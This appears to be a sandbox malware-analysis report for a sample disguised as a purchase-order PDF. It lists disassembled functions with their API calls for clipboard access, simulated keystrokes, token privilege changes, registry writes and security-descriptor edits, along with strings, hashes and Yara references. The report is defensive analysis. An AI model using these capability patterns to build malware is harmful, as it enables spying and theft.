Instruction Fuzzy Hash: 44938F71A04219DBDB24DF98C891BADB7B1FF48714F24816EE945EB281E770DE82CB50

Function 00874A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00874A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008ADA8E
IsIconic.USER32(?), ref: 008ADA97
ShowWindow.USER32(?,00000009), ref: 008ADAA4
SetForegroundWindow.USER32(?), ref: 008ADAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008ADAC4
GetCurrentThreadId.KERNEL32 ref: 008ADACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 008ADAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 008ADAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 008ADAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 008ADAF8
SetForegroundWindow.USER32(?), ref: 008ADAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 008ADB10
keybd_event.USER32(00000012,00000000), ref: 008ADB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 008ADB25
keybd_event.USER32(00000012,00000000), ref: 008ADB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 008ADB33
keybd_event.USER32(00000012,00000000), ref: 008ADB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 008ADB42
keybd_event.USER32(00000012,00000000), ref: 008ADB47
SetForegroundWindow.USER32(?), ref: 008ADB4A
AttachThreadInput.USER32(?,?,00000000), ref: 008ADB71

Strings

Shell_TrayWnd, xrefs: 008ADA89

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 4e90ea1c0c05fdaea84199473ff8e01112ee66db8e0e0d15eb6b60c8299b1a5f
Instruction ID: 816e397fb122ce06d4cad03170d3a1819ab140cf9597bf06e2fa25d95e885ff2
Opcode Fuzzy Hash: 4e90ea1c0c05fdaea84199473ff8e01112ee66db8e0e0d15eb6b60c8299b1a5f
Instruction Fuzzy Hash: FD314F71A40318BBEB216F719C4AF7E7E6CFF45B60F114025FA05EA1D1DAB05901EAA4

Function 008C8858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 008C8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008C8D0D
Part of subcall function 008C8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008C8D3A
Part of subcall function 008C8CC3: GetLastError.KERNEL32 ref: 008C8D47

_memset.LIBCMT ref: 008C889B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008C88ED
CloseHandle.KERNEL32(?), ref: 008C88FE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008C8915
GetProcessWindowStation.USER32 ref: 008C892E
SetProcessWindowStation.USER32(00000000), ref: 008C8938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 008C8952

Part of subcall function 008C8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008C8851), ref: 008C8728
Part of subcall function 008C8713: CloseHandle.KERNEL32(?,?,008C8851), ref: 008C873A

Strings

default, xrefs: 008C894D
winsta0, xrefs: 008C8910
, xrefs: 008C88AA

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 3b0d41ca29a3d8f26f8608cb8d667d27ba0c62db6f249084f38f86a25b269fc2
Instruction ID: fb24c716f9153c73d13c9b629b8b2137fe108db985f14ea01a88994bfae17abf
Opcode Fuzzy Hash: 3b0d41ca29a3d8f26f8608cb8d667d27ba0c62db6f249084f38f86a25b269fc2
Instruction Fuzzy Hash: 1B812371980269EFDF11DFA4DC45EAEBBB8FF04304F08416AF910E6261DB358A14DB62

Function 008E425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(008FF910), ref: 008E4284
IsClipboardFormatAvailable.USER32(0000000D), ref: 008E4292
GetClipboardData.USER32(0000000D), ref: 008E429A
CloseClipboard.USER32 ref: 008E42A6
GlobalLock.KERNEL32(00000000), ref: 008E42C2
CloseClipboard.USER32 ref: 008E42CC
GlobalUnlock.KERNEL32(00000000,00000000), ref: 008E42E1
IsClipboardFormatAvailable.USER32(00000001), ref: 008E42EE
GetClipboardData.USER32(00000001), ref: 008E42F6
GlobalLock.KERNEL32(00000000), ref: 008E4303
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 008E4337
CloseClipboard.USER32 ref: 008E4447

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: d200f8768753de32fa027759c50fd8440cf6744c184ddac2afeaea61c6eccb43
Instruction ID: 5a47b784b39be90b614b06cc7c5f64f2127afd046f6242c9f35d77afd022fc9b
Opcode Fuzzy Hash: d200f8768753de32fa027759c50fd8440cf6744c184ddac2afeaea61c6eccb43
Instruction Fuzzy Hash: B251AA31204246ABD311AF65EC86F7E77A8FF95B00F004529F69AD22A2DF70D904CB66

Function 008DC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 008DC9F8
FindClose.KERNEL32(00000000), ref: 008DCA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008DCA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008DCA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 008DCAAF
__swprintf.LIBCMT ref: 008DCAFB
__swprintf.LIBCMT ref: 008DCB3E

Part of subcall function 00877F41: _memmove.LIBCMT ref: 00877F82

__swprintf.LIBCMT ref: 008DCB92

Part of subcall function 008938D8: __woutput_l.LIBCMT ref: 00893931

__swprintf.LIBCMT ref: 008DCBE0

Part of subcall function 008938D8: __flsbuf.LIBCMT ref: 00893953
Part of subcall function 008938D8: __flsbuf.LIBCMT ref: 0089396B

__swprintf.LIBCMT ref: 008DCC2F
__swprintf.LIBCMT ref: 008DCC7E
__swprintf.LIBCMT ref: 008DCCCD

Strings

%4d, xrefs: 008DCB38
%4d%02d%02d%02d%02d%02d, xrefs: 008DCAF5
%02d, xrefs: 008DCB86, 008DCB90, 008DCBDE, 008DCC2D, 008DCC7C, 008DCCCB

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 29b1fd2b57e38b89e139323c17b7a4aa200f4f3eec23579cbe4111df5e9b953e
Instruction ID: 6296f3f82e28e6053b57e68cd0d5cc65fe31cac629d95579885444b7cd44f538
Opcode Fuzzy Hash: 29b1fd2b57e38b89e139323c17b7a4aa200f4f3eec23579cbe4111df5e9b953e
Instruction Fuzzy Hash: A0A140B1508315ABC700EB68C885DAFB7ECFF94704F404929F599D3191EA34DA09CB63

Function 008DF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 008DF221
_wcscmp.LIBCMT ref: 008DF236
_wcscmp.LIBCMT ref: 008DF24D
GetFileAttributesW.KERNEL32(?), ref: 008DF25F
SetFileAttributesW.KERNEL32(?,?), ref: 008DF279
FindNextFileW.KERNEL32(00000000,?), ref: 008DF291
FindClose.KERNEL32(00000000), ref: 008DF29C
FindFirstFileW.KERNEL32(*.*,?), ref: 008DF2B8
_wcscmp.LIBCMT ref: 008DF2DF
_wcscmp.LIBCMT ref: 008DF2F6
SetCurrentDirectoryW.KERNEL32(?), ref: 008DF308
SetCurrentDirectoryW.KERNEL32(0092A5A0), ref: 008DF326
FindNextFileW.KERNEL32(00000000,00000010), ref: 008DF330
FindClose.KERNEL32(00000000), ref: 008DF33D
FindClose.KERNEL32(00000000), ref: 008DF34F

Strings

*.*, xrefs: 008DF2B3

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: e4e8442d41e292fab656f991052ad8e04e9e21a2c6166ba54c33e19036b7387a
Instruction ID: aff6ad71ba1d826fcd9f274902fc2a5b2c367a258d068abe059fa7bb53489f91
Opcode Fuzzy Hash: e4e8442d41e292fab656f991052ad8e04e9e21a2c6166ba54c33e19036b7387a
Instruction Fuzzy Hash: A131D2765002196BCB14EBB4EC88EEE73ACFF48320F144276FA11D3292EB30DA45DA54

Function 008F0AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008F0BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,008FF910,00000000,?,00000000,?,?), ref: 008F0C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 008F0C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 008F0D1D
RegCloseKey.ADVAPI32(?), ref: 008F103D
RegCloseKey.ADVAPI32(00000000), ref: 008F104A

Strings

REG_EXPAND_SZ, xrefs: 008F0CBA
REG_MULTI_SZ, xrefs: 008F0E05
REG_SZ, xrefs: 008F0D5B
REG_QWORD, xrefs: 008F0F8B
REG_BINARY, xrefs: 008F0FD8
REG_DWORD, xrefs: 008F0F0E

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 060ee52838e36a090477e36994ce4daef3d0ff19a0132dd14d923e1142511e92
Instruction ID: 52cd786a9f6a5367e52e573793b01a3a0dc8ba4fd4cf547e9906173c01de5231
Opcode Fuzzy Hash: 060ee52838e36a090477e36994ce4daef3d0ff19a0132dd14d923e1142511e92
Instruction Fuzzy Hash: 420218752046159FDB14EF28C895A2ABBE5FF89724F04845DFA89DB362CB30ED41CB42

Function 008DF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 008DF37E
_wcscmp.LIBCMT ref: 008DF393
_wcscmp.LIBCMT ref: 008DF3AA

Part of subcall function 008D45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008D45DC

FindNextFileW.KERNEL32(00000000,?), ref: 008DF3D9
FindClose.KERNEL32(00000000), ref: 008DF3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 008DF400
_wcscmp.LIBCMT ref: 008DF427
_wcscmp.LIBCMT ref: 008DF43E
SetCurrentDirectoryW.KERNEL32(?), ref: 008DF450
SetCurrentDirectoryW.KERNEL32(0092A5A0), ref: 008DF46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 008DF478
FindClose.KERNEL32(00000000), ref: 008DF485
FindClose.KERNEL32(00000000), ref: 008DF497

Strings

*.*, xrefs: 008DF3FB

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: e42273c81771ce18f82eb0359f401daab4ac7323e5f82926d16c5f16bd367414
Instruction ID: 88ff425f86d2d5fcba1181ba4386674c5a06acbf02fae8e27f16014646c7d3ae
Opcode Fuzzy Hash: e42273c81771ce18f82eb0359f401daab4ac7323e5f82926d16c5f16bd367414
Instruction Fuzzy Hash: E831C6725012196BCF10ABB4EC84EEF77ADFF49324F140276FA11E22A2D730DA44DA54

Function 008C81F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 008C874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008C8766
Part of subcall function 008C874A: GetLastError.KERNEL32(?,008C822A,?,?,?), ref: 008C8770
Part of subcall function 008C874A: GetProcessHeap.KERNEL32(00000008,?,?,008C822A,?,?,?), ref: 008C877F
Part of subcall function 008C874A: HeapAlloc.KERNEL32(00000000,?,008C822A,?,?,?), ref: 008C8786
Part of subcall function 008C874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008C879D

Part of subcall function 008C87E7: GetProcessHeap.KERNEL32(00000008,008C8240,00000000,00000000,?,008C8240,?), ref: 008C87F3
Part of subcall function 008C87E7: HeapAlloc.KERNEL32(00000000,?,008C8240,?), ref: 008C87FA
Part of subcall function 008C87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,008C8240,?), ref: 008C880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008C825B
_memset.LIBCMT ref: 008C8270
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008C828F
GetLengthSid.ADVAPI32(?), ref: 008C82A0
GetAce.ADVAPI32(?,00000000,?), ref: 008C82DD
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008C82F9
GetLengthSid.ADVAPI32(?), ref: 008C8316
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 008C8325
HeapAlloc.KERNEL32(00000000), ref: 008C832C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 008C834D
CopySid.ADVAPI32(00000000), ref: 008C8354
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008C8385
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008C83AB
SetUserObjectSecurity.USER32(?,00000004,?), ref: 008C83BF

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: d23834bec324bcbfbbc210ed44f70f08481d1a7a4f77b55d4cc3c5bb8b2e95ca
Instruction ID: 278e6eb1f6b43332ec913ff81a096457d0f7a2134c40f3cbd1cd29d2efaff108
Opcode Fuzzy Hash: d23834bec324bcbfbbc210ed44f70f08481d1a7a4f77b55d4cc3c5bb8b2e95ca
Instruction Fuzzy Hash: 40613471A40209EFDF009FA4DC84EAEBBB9FF44700F148269E915E7291DB31DA15CB60

Function 00886843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON

Download Yara Rule

Strings

CRLF), xrefs: 008C16FA
ANYCRLF), xrefs: 008C1734
LIMIT_RECURSION=, xrefs: 008C1635
NO_START_OPT), xrefs: 008C1588
UTF), xrefs: 008C1533
BSR_ANYCRLF), xrefs: 008C1757
LIMIT_MATCH=, xrefs: 008C15A9
LF), xrefs: 008C16DD
BSR_UNICODE), xrefs: 008C1771
NO_AUTO_POSSESS), xrefs: 008C1567
UTF16), xrefs: 008C1508
UCP), xrefs: 008C1546
CR), xrefs: 008C16C0
ANY), xrefs: 008C1717

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: a6c1e3f398ededd4ce7d4da84075cc7932c0960f481a95a93bc1226f723287e8
Instruction ID: 2bd125cc376561ccb7d82d4d23b1ea73f2aa0b70eefdb4011195ad3b44eac861
Opcode Fuzzy Hash: a6c1e3f398ededd4ce7d4da84075cc7932c0960f481a95a93bc1226f723287e8
Instruction Fuzzy Hash: 40727E75E00219DBDF24DF58C884BAEB7B5FF49314F14816AE949EB285EB309D81CB90

Function 008F0665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008F10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008F0038,?,?), ref: 008F10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008F0737

Part of subcall function 00879997: __itow.LIBCMT ref: 008799C2
Part of subcall function 00879997: __swprintf.LIBCMT ref: 00879A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 008F07D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008F086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 008F0AAD
RegCloseKey.ADVAPI32(00000000), ref: 008F0ABA

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: ed9fb2fab5b289aee7ff2807498b7c927de026e66d0c2105eb4e13ec5dc838a1
Instruction ID: 6d6ffce53ae5b447e231e0b2910c31a43a519ff9db83a2fc84cf863e3f672725
Opcode Fuzzy Hash: ed9fb2fab5b289aee7ff2807498b7c927de026e66d0c2105eb4e13ec5dc838a1
Instruction Fuzzy Hash: F1E14C71604214AFCB14DF28C895E2ABBE5FF89714B04856DF68ADB262DB31E901CF52

Function 008D0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 008D0241
GetAsyncKeyState.USER32(000000A0), ref: 008D02C2
GetKeyState.USER32(000000A0), ref: 008D02DD
GetAsyncKeyState.USER32(000000A1), ref: 008D02F7
GetKeyState.USER32(000000A1), ref: 008D030C
GetAsyncKeyState.USER32(00000011), ref: 008D0324
GetKeyState.USER32(00000011), ref: 008D0336
GetAsyncKeyState.USER32(00000012), ref: 008D034E
GetKeyState.USER32(00000012), ref: 008D0360
GetAsyncKeyState.USER32(0000005B), ref: 008D0378
GetKeyState.USER32(0000005B), ref: 008D038A

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 4b9bfba8022d3bdbe927455661db7ee4e16782d68dcb2ce66c1be708eef5e5d5
Instruction ID: f1861b17097337a1d137fabf97757049c06b39d7c3e7dc3820a3181f241f3ad7
Opcode Fuzzy Hash: 4b9bfba8022d3bdbe927455661db7ee4e16782d68dcb2ce66c1be708eef5e5d5
Instruction Fuzzy Hash: B94185249047C96AFB355B6488087B5BBA0FF15344F48425FD5C5C63C2DA9499C8CF92

Function 008E86D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00879997: __itow.LIBCMT ref: 008799C2
Part of subcall function 00879997: __swprintf.LIBCMT ref: 00879A0C

CoInitialize.OLE32 ref: 008E8718
CoUninitialize.OLE32 ref: 008E8723
CoCreateInstance.OLE32(?,00000000,00000017,00902BEC,?), ref: 008E8783
IIDFromString.OLE32(?,?), ref: 008E87F6
VariantInit.OLEAUT32(?), ref: 008E8890
VariantClear.OLEAUT32(?), ref: 008E88F1

Strings

Failed to create object, xrefs: 008E878E, 008E8844
NULL Pointer assignment, xrefs: 008E87C8
Invalid parameter, xrefs: 008E880F

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 8144a90304ee6c5284b92ffa9faf261d174d41f5edfbcce62659f82dfc33c731
Instruction ID: a7216a12faa3e49f8c27ad515f6bdd4b19812576cf32a369b9d214695786b3f2
Opcode Fuzzy Hash: 8144a90304ee6c5284b92ffa9faf261d174d41f5edfbcce62659f82dfc33c731
Instruction Fuzzy Hash: 4E616871608251DFD710DF25C849A6EBBE8FF8A718F104829F989DB291DB70ED44CB92

Function 008E4458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 008E447F
EmptyClipboard.USER32 ref: 008E4485
GlobalAlloc.KERNEL32(00000002,?), ref: 008E449A
CloseClipboard.USER32 ref: 008E4539

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
